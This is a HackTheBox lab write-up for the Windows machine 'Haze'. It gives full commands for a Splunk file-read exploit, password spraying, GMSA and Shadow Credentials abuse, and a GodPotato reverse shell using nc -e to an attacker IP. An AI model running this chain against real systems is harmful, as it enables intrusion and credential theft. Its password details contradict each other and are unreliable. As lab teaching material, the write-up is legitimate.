Home » Posts » Haze Writeup

Haze Writeup

0x5t
0x5t avatar
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Posted:  |  Tags: HackTheBox, Windows, Splunk, Active Directory, SeImpersonatePrivilege

Haze is a hard difficulty HackTheBox machine that involves exploiting a Splunk Arbitrary File Read vulnerability to gain initial access, leveraging Active Directory for lateral movement and abusing the SeImpersonatePrivilege to gain a SYSTEM shell.

Quick Metadata

Item Value
Machine Haze
Difficulty Hard
IP 10.10.10.10
OS Windows
Primary Vulns Splunk Arbitrary File Read, Shadow Credentials, SeImpersonatePrivilege

Exploitation Chain (High-Level)

  1. Splunk Arbitrary File Read (CVE-2024-36991) to extract an encrypted LDAP bind password.
  2. Decrypt the password with the splunk.secret key, then use the credentials for BloodHound analysis.
  3. Password spraying with the discovered credentials reveals another user with GMSA management rights.
  4. Exploit the PrincipalsAllowedToRetrieveManagedPassword property to dump a privileged service account hash.
  5. Use Shadow Credentials to compromise the edward.martin user, leading to the user flag.
  6. Access a backup folder to find Splunk admin credentials, then use a custom app to get a reverse shell.
  7. Exploit SeImpersonatePrivilege to impersonate SYSTEM and get the root flag.

Pre-Reqs

  • Tooling: nmap, python3, evil-winrm, netexec, impacket, certipy
  • Skills: Splunk exploitation, BloodHound analysis, Active Directory abuse

Skills Required

  • Web application exploitation
  • Active Directory enumeration and attack paths
  • Windows privilege abuse
  • Cryptographic key retrieval and decryption

Skills Learned

  • Exploiting Splunk CVE-2024-36991 for arbitrary file read.
  • Decrypting Splunk-encrypted passwords with splunk.secret.
  • Using netexec for RID brute-forcing and GMSA password retrieval.
  • Performing a Shadow Credentials attack.
  • Abusing SeImpersonatePrivilege to escalate privileges.

Enumeration

Network Scan

The initial Nmap scan reveals several open ports, with key services being DNS, Kerberos, LDAP, and three ports related to a Splunk instance.

Ports discovered:

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP
8000/tcp open  http         Splunkd httpd
8088/tcp open  ssl/http     Splunkd httpd
8089/tcp open  ssl/http     splunkd
9389/tcp open  mc-nmf       .NET Message Framing

Nmap Commands

nmap -p- --min-rate 1000 -T4 10.10.10.10
nmap -p53,88,135,139,389,8000,8088,8089,9389 -sC -sV 10.10.10.10

The DNS record haze.htb is associated with the IP. The open ports suggest that the machine is a Windows Domain Controller. The ports 8000, 8088, and 8089 point to a Splunk instance.

Add host entry:

echo "10.10.10.10 haze.htb dc01.haze.htb" | sudo tee -a /etc/hosts

Web Enumeration (if applicable)

Visiting http://haze.htb:8000 presents a Splunk Enterprise login page. Accessing the management port at https://haze.htb:8089 reveals the Splunk version is 9.2.1.

Service-Specific Enumeration

We identified the Splunk version 9.2.1 and searched for relevant CVEs. This led to a public Proof of Concept for CVE-2024-36991, an arbitrary file read vulnerability.

Credentials / Artifacts Discovered

The exploit against the Splunk vulnerability gave us hashes for four Splunk users: admin, edward, mark, and paul. The hashes were not immediately crackable.

Foothold

Initial Vulnerability (Splunk Arbitrary File Read CVE-2024-36991)

The Splunk version is vulnerable to an arbitrary file read, which we can use to read local files. By using the exploit's source code as a reference, we can modify the path traversal payload to target files on a Windows system.

Context:

  • Vulnerable application: Splunkd httpd (v9.2.1)
  • Vulnerability: Arbitrary file read
  • Exploit: A public Python PoC for CVE-2024-36991.

Using the exploit, we can read the authentication.conf and splunk.secret files to decrypt a password for a Splunk user account.

Exploit:

## PoC execution to get Splunk user hashes
python3 CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000

## Proxying the request to read Splunk config files
HTTP_PROXY=http://127.0.0.1:8080 python3 CVE-2024-36991/CVE-2024-36991.py -u http://haze.htb:8000

By reading the authentication.conf file, we find that LDAP authentication is enabled and discover an encrypted password for the paul.taylor account. We then read the splunk.secret file and use the splunksecrets tool to decrypt the password.

Splunkadmin@2k24

With the paul.taylor credentials, we can run a bloodhound scan.

Lateral Movement

Enumeration as Low-Priv User

The BloodHound scan with paul.taylor's credentials reveals a number of user accounts, but with restricted permissions to query the domain. By using netexec with RID brute-force, we get a full list of usernames.

Using the paul.taylor password against the discovered usernames via password spraying, we find that the mark.adams account has the same password.

## Password spraying with netexec
netexec ldap 10.10.10.10 -u usernames.txt -p 'Ld@p_Auth_Splunk@2k24' --continue-on-success

Re-running the BloodHound scan as mark.adams reveals more privileges. We find that mark.adams is a member of the GMSA_MANAGERS group and has WriteProperty rights over the HAZE-IT-BACKUPS service account.

Pivot Technique (GMSA Account Abuse)

Since we have WriteProperty rights on the HAZE-IT-BACKUPS service account, we can add ourselves to the PrincipalsAllowedToRetrieveManagedPassword property. We then retrieve the NTLM hash for the service account using netexec.

## Set PrincipalsAllowedToRetrieveManagedPassword property
evil-winrm -i 10.10.10.10 -u mark.adams -p 'Ld@p_Auth_Splunk@2k24'
## Inside evil-winrm
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword mark.adams

## Get GMSA password
nxc ldap 10.10.10.10 -u mark.adams -p 'Ld@p_Auth_Splunk@2k24' --gmsa

The NTLM hash for HAZE-IT-BACKUP$ is 723fd747a7523dbebfc5b1d3d759ffbf.

A new BloodHound scan using the HAZE-IT-BACKUP$ service account reveals a WriteOwner control over the SUPPORT_SERVICES group. We abuse this to become the owner, grant ourselves AddMember rights, and add HAZE-IT-BACKUP$ to the group.

The SUPPORT_SERVICES group has ForceChangePassword and AddKeyCredentialLink rights over the edward.martin user. We use certipy to perform a Shadow Credentials attack to compromise edward.martin. This gives us a new NT hash for this user.

## Shadow Credentials attack with certipy
certipy-ad shadow auto -username '[email protected]' -hashes :723fd747a7523dbebfc5b1d3d759ffbf -account edward.martin -target dc01.haze.htb -dc-ip 10.10.10.10

The NT hash for edward.martin is 09e0b3eeb2e7a6b0d419e9ff8f4d91af.

We can now use evil-winrm to connect as edward.martin and retrieve the user flag.

evil-winrm -i 10.10.10.10 -u edward.martin -H 09e0b3eeb2e7a6b0d419e9ff8f4d91af

Post-Exploitation (Hashes / Loot)

The edward.martin user is a member of the BACKUP_REVIEWERS group. This group has read access to the C:\Backups\Splunk directory, which contains a zipped backup of the Splunk installation. By downloading and examining the backup, we discover a different splunk.secret and a new authentication.conf file. This new configuration file contains an encrypted password for the alexander.green user, who is a member of the Splunk_Admins group.

We use the new splunk.secret to decrypt the password for alexander.green to Splunkadmin@2k24. This gives us administrative access to the Splunk web panel.

Privilege Escalation

Vector 1: SeImpersonatePrivilege

With administrative access to Splunk, we can upload a custom app to get a reverse shell. The alexander.green user account that runs the Splunk service has the SeImpersonatePrivilege enabled.

Evidence:

## Check privileges
whoami /priv

Privilege Name                Description                         State
============================= =================================== =====================
SeImpersonatePrivilege        Impersonate a client after          Enabled

Exploit:

We can use a tool like GodPotato to exploit the SeImpersonatePrivilege and escalate to a SYSTEM shell.

## Listener 1
nc -lvnp 4444
## Splunk reverse shell trigger
## Listener 2
nc -lvnp 4445
## Trigger GodPotato with a command to get a new shell
./GodPotato.exe -cmd ".\nc.exe 10.11.11.11 4445 -e cmd.exe"

Result: Obtained NT AUTHORITY\SYSTEM privileges.

Root Flag

type C:\Users\Administrator\Desktop\root.txt

Hash / Flag: {REDACTED}

Summary

  1. Recon: Performed a network scan, identified a Splunk instance, and discovered an arbitrary file read vulnerability (CVE-2024-36991).
  2. Foothold: Used the vulnerability to read Splunk configuration files, decrypt a password for paul.taylor, and then used password spraying to find credentials for mark.adams.
  3. Lateral: Used mark.adams's privileges to modify a GMSA account and dump the hash for HAZE-IT-BACKUP$. Then, used the service account to perform a Shadow Credentials attack to compromise edward.martin, gaining a user shell and the user flag.
  4. Privilege Escalation: Accessed a backup file as edward.martin to find new Splunk admin credentials. Uploaded a custom app to Splunk to get a reverse shell as alexander.green, then exploited the SeImpersonatePrivilege to get a SYSTEM shell.

Lessons Learned

  • Always check for cryptographic keys and configuration files when exploiting web applications like Splunk.
  • Active Directory abuse can involve complex chains of privilege, like modifying properties of service accounts and groups.
  • The SeImpersonatePrivilege is a common and powerful vector for Windows privilege escalation.

Additional Resources

Back to Posts
Contents